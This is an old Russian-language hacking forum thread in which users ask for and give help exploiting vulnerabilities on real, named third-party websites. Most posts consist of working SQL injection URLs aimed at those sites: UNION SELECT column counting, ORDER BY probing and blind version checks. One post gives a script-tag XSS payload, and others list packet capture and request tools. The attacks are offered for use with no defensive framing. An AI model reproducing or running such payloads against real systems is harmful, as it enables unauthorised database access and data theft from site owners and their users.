Ваши вопросы по уязвимостям.

Gorev · 5 Mar 2009

2 zifanchuck давай урлу

F4R · 5 Mar 2009

Microsoft OLE DB Provider for SQL Server error '80040e21'

Unclosed quotation mark before the character string ''.

/inc/connection.asp, line 48
Click to expand...

это бага?

если да то неполучается узнать даже версию
Code:
/details.asp?id=699882982&dme_code=1%20or%201=@@version--
в ответ получаю
Code:
Microsoft OLE DB Provider for SQL Server error '80040e21'  Incorrect syntax near the keyword 'or'.  /inc/connection.asp, line 48 

попугай · 5 Mar 2009

or 1=(select @@version)

-m0rgan- · 5 Mar 2009

F4R, читай литературу по MSSQL!

F4R · 6 Mar 2009

дак я читал вчера весь день...

на

/details.asp?id=699882982&dme_code=or 1=(select @@version)
Click to expand...

выводит

Microsoft OLE DB Provider for SQL Server error '80040e21'

Incorrect syntax near the keyword 'or'.

/inc/connection.asp, line 48
Click to expand...

Gorev · 6 Mar 2009

http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=li%20zdes'%20ili%20prosto?

что здесь такое?

Zitt · 6 Mar 2009

http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=&mod=prosto

DimOnOID · 6 Mar 2009

Gorev said:

http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=li%20zdes'%20ili%20prosto?

что здесь такое?
Click to expand...
Code:
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=<script>alert(/dd/)</script>
Не более...

Gorev · 6 Mar 2009

http://www.tamasitheatre.ro/ro/1.html?cikk_id=3780+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--

version() PostgreSQL

не могу найти вывод, или все таки слепая?

Kakoytoxaker · 6 Mar 2009

VITАL said:

есть скуля... вроде. но что то не так
Click to expand...

Фильтрация union, select
Работает
http://www.topnews.ru/citation.php?autor=749+order+by+8/*
Неработает
http://www.topnews.ru/citation.php?autor=749+order+by+8/*union*//*

Gorev
http://www.tamasitheatre.ro/ro/1.html?cikk_id=-3780+union+select+null,null,version(),null,4,null,null,null,1,null,null,null,null,null,null,2,3--

F4R · 6 Mar 2009

/details.asp?id=699882982&dme_code=or 1=(select @@version)
Click to expand...

вылезает ошибка:

Microsoft OLE DB Provider for SQL Server error '80040e21'

Incorrect syntax near the keyword 'or'.

/inc/connection.asp, line 48
Click to expand...

кто что может сказать?

Kakoytoxaker · 6 Mar 2009

F4R said:

кто что может сказать?
Click to expand...

Я могу сказать вот что:

ОТСТАНЬ ОТ ЭТОГО САЙТА.

И лучше тебе прислушаться

F4R · 6 Mar 2009

jokester said:

Я могу сказать вот что:

ОТСТАНЬ ОТ ЭТОГО САЙТА.

И лучше тебе прислушаться
Click to expand...

а ты знаешь что это за сайт?

мне всего лишь хочется узнать версию и всё..

Kakoytoxaker · 6 Mar 2009

F4R said:

а ты знаешь что это за сайт?
Click to expand...

http://www.google.com/search?client=opera&rls=ru&q=dme_code&sourceid=opera&ie=utf-8&oe=utf-8

F4R · 6 Mar 2009

фигасе
)

VIP · 6 Mar 2009

DimOnOID said:

ну это можно посмотреть глянув в "html код" страницы...
Ну или
скачай Naviscope для перехвата пакетов + InetCrack and AccessDiver для посылки пакетов ....
Click to expand...

А аналоги под линуху есть?

oRb · 6 Mar 2009

VIP said:

А аналоги под линуху есть?
Click to expand...

захват: wireshark, ettercap, ngrep, tcpdump
посылка: netcat, curl

[Raz0r] · 6 Mar 2009

А аналоги под линуху есть?
Click to expand...

Burp Suite, WebScarab

+++AndreyDevil+++ · 6 Mar 2009

Есть скуля========================================================
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1'
================================================================
Слобцов 7......
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+7--
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+8--
================================================================
Когда ввожу----- http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+union+select+1,2,3,4,5,6,7--
Всё равно пишит-------The used SELECT statements have a different number of columns
================================================================
Что такое? Как это обойти?
================================================================
P.S===== А так же http://www.higherhacknell.co.uk/recipes.php?id=-1' ! Нельзя перебрать с помощью ORDER BY(Редериктит сразу).....Что в таком случае возможно сделать?
Заранее спасибо! )) (Если где-то обсуждалось, то извините, не видел))))
================================================================
================================================================

-m0rgan- · 6 Mar 2009

Code:

http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=5--

Code:

http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=4--

Code:

http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=3--

3-тяя ветка, в ней union select непашет!

Ваши вопросы по уязвимостям.

Gorev Level 8

F4R Banned

попугай Elder - Старейшина

-m0rgan- Elder - Старейшина

F4R Banned

Gorev Level 8

Zitt Elder - Старейшина

DimOnOID Banned

Gorev Level 8

Kakoytoxaker Elder - Старейшина

F4R Banned

Kakoytoxaker Elder - Старейшина

F4R Banned

Kakoytoxaker Elder - Старейшина

F4R Banned

VIP Elder - Старейшина

oRb Elder - Старейшина

[Raz0r] Elder - Старейшина

+++AndreyDevil+++ Member

-m0rgan- Elder - Старейшина

Useful Searches

Ваши вопросы по уязвимостям.

Gorev Level 8

F4R Banned

попугай Elder - Старейшина

-m0rgan- Elder - Старейшина

F4R Banned

Gorev Level 8

Zitt Elder - Старейшина

DimOnOID Banned

Gorev Level 8

Kakoytoxaker Elder - Старейшина

F4R Banned

Kakoytoxaker Elder - Старейшина

F4R Banned

Kakoytoxaker Elder - Старейшина

F4R Banned

VIP Elder - Старейшина

oRb Elder - Старейшина

[Raz0r] Elder - Старейшина

+++AndreyDevil+++ Member

-m0rgan- Elder - Старейшина